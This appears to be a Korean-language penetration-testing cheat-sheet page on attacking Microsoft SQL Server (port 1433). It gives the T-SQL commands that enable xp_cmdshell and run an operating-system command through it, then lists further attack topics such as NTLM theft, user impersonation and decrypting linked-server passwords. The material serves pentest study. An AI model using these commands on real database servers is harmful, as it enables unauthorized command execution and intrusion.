1433 - mssql
XP_CMDSHELL
# 활성화 여부 확인
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
# XP_CMDSHELL 프로시저 활성화 및 저장
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# 원격 명령 실행
EXEC xp_cmdshell 'whoami';
# XP_CMDSHELL 프로시저 비활성화 및 저장
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'Show Advanced Options', 0; RECONFIGURE;RID Cycling
NTLM 탈취
Linked Server
User Impersonation
SeImpersonatePrivilege
TRUSTWORTHY
Decrypting Linked Server Passwords
References
Last updated